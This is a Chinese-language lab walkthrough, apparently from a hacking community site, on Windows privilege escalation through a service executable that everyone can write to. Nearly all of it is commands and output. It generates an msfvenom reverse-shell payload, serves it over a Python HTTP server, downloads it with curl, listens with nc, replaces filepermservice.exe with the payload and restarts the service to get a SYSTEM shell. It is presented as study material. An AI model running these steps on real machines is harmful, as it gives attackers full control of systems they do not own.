利用可执行服务文件提权
我们的服务启动的时候是伴随着一个exe文件启动的,而我们如果对这个exe文件和目录有可写权限就可以用恶意文件去覆盖掉正常的文件进行提权
msf生成shell
root@ip-10-10-4-200:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.4.200 LPORT=6666 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
root@ip-10-10-4-200:~/Desktop#
开启http服务
root@ip-10-10-4-200:~/Desktop# python3 -m http.server 1010
Serving HTTP on 0.0.0.0 port 1010 (<http://0.0.0.0:1010/>) ...
curl下载远程文件
curl -O 10.10.4.200:1010/reverse.exe
攻击机监听6666端口并运行目标机器shell进行反弹
查询" filepermsvc" 服务看看有没有运行系统的权限(SERVICE_START_NAME) .
root@ip-10-10-4-200:~/Desktop# nc -lvnp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.249.138 49806 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Users\\user\\Desktop>sc qc filepermsvc
sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: filepermsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : File Permissions Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\\Users\\user\\Desktop>
accesschk检查文件权限
C:\\PrivEsc\\accesschk.exe /accepteula -quvw "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
运行结果
C:\\Users\\user\\Desktop>C:\\PrivEsc\\accesschk.exe /accepteula -quvw "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
C:\\PrivEsc\\accesschk.exe /accepteula -quvw "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
C:\\Program Files\\File Permissions Service\\filepermservice.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\\Administrator
FILE_ALL_ACCESS
RW BUILTIN\\Users
FILE_ALL_ACCESS
C:\\Users\\user\\Desktop>
检查我们是否能够启动/停止服务
C:\\PrivEsc\\accesschk.exe /accepteula -uvqc filepermsvc
运行结果
C:\\Users\\user\\Desktop>C:\\PrivEsc\\accesschk.exe /accepteula -uvqc filepermsvc
C:\\PrivEsc\\accesschk.exe /accepteula -uvqc filepermsvc
filepermsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\\Administrators
SERVICE_ALL_ACCESS
R Everyone
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\\Users\\user\\Desktop>
安全备份原始文件,并将shell的exe文件对其进行替换
copy "C:\\Program Files\\File Permissions Service\\filepermservice.exe" C:\\Temp
copy /Y C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
执行结果
C:\\Users\\user\\Desktop>copy "C:\\Program Files\\File Permissions Service\\filepermservice.exe" C:\\Temp
copy "C:\\Program Files\\File Permissions Service\\filepermservice.exe" C:\\Temp
1 file(s) copied.
C:\\Users\\user\\Desktop>copy /Y C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
copy /Y C:\\Users\\user\\Desktop\\reverse.exe "C:\\Program Files\\File Permissions Service\\filepermservice.exe"
1 file(s) copied.
攻击机监听shell端口,目标机重启服务
C:\\Users\\user\\Desktop>net start filepermsvc
net start filepermsvc
shell弹回来了
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
